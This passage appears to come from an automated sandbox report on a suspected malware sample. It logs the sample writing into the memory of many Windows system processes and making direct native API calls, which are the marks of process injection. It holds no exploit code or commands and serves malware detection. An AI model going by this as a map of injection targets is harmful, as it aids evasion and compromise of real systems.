        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe NtClose: Direct from: 0x76F02B6C
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe NtSetInformationProcess: Direct from: 0x76F02C5C
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe NtCreateMutant: Direct from: 0x76F035CC
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe NtMapViewOfSection: Direct from: 0x76F02D1C
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe NtResumeThread: Direct from: 0x76F036AC
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe NtDelayExecution: Direct from: 0x76F02DDC
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe NtSetInformationThread: Direct from: 0x76F02ECC
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe NtQueryInformationProcess: Direct from: 0x76F02C26
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: PID: 2580 base: 11C0000 value: E8
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: PID: 2580 base: 1220000 value: E8
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: PID: 2580 base: 3110000 value: E8
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: PID: 2580 base: 3230000 value: E8
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: PID: 2580 base: 3250000 value: E8
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: PID: 2580 base: 33C0000 value: E8
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: PID: 2580 base: 33F0000 value: E8
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: PID: 2580 base: 3400000 value: E8
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: PID: 2580 base: 3430000 value: E8
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: PID: 2580 base: 3450000 value: E8
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: PID: 2580 base: 3460000 value: E8
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Windows\System32\fontdrvhost.exe base: D30000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Windows\System32\fontdrvhost.exe base: 830000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Windows\System32\dwm.exe base: 8F0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Windows\System32\sihost.exe base: AC0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Windows\System32\svchost.exe base: 910000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Windows\System32\svchost.exe base: 9A0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Windows\System32\ctfmon.exe base: A50000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Windows\explorer.exe base: 11C0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Windows\System32\svchost.exe base: D40000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B50000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 110000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: A90000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: AB0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Windows\System32\smartscreen.exe base: 290000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 580000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 3D0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 900000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 180000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A10000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 190000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F10000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 10000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Windows\System32\svchost.exe base: 9F0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Windows\System32\dllhost.exe base: A10000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Windows\System32\conhost.exe base: C00000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 320000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: B10000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 7F0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 840000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: C90000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: CA0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1290000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 12A0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: F60000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: F70000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: DA0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: DB0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 7D0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 7E0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: B90000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BA0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BB0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BC0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 13A0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 13B0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BA0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BB0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 790000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 7A0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: E00000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: E50000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 15A0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 15F0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 700000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 710000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 7D0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 7E0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BC0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BD0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1340000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1390000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A10000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A20000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1300000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1310000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: B90000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BA0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 690000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 6A0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A20000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A30000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: B90000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BE0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 5D0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 5E0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: FB0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: FC0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: F10000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: F20000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 590000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 5A0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 800000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 850000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: B90000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BE0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: F80000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: F90000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: B60000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BB0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A00000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A10000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1050000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1060000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: DA0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: DB0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 14B0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 14C0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 580000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 590000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 920000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 970000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 520000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 530000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 4F0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 500000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BC0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BD0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 860000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 870000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 5D0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 5E0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1140000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1150000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 9B0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 9C0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 10A0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 10B0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BA0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BB0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A10000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A20000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: DB0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: DC0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 6E0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 6F0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 3B0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 3C0000
